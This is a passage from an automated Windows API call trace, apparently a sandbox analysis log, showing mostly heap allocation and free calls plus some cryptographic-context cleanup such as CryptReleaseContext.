hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0130.993] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.993] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0130.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.993] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0130.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.996] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0130.996] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.996] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.996] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0130.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0130.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0130.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.997] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.998] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0130.998] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0130.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.999] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.999] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0130.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0131.000] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0131.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0131.001] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0131.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.001] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0131.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0131.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0131.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, 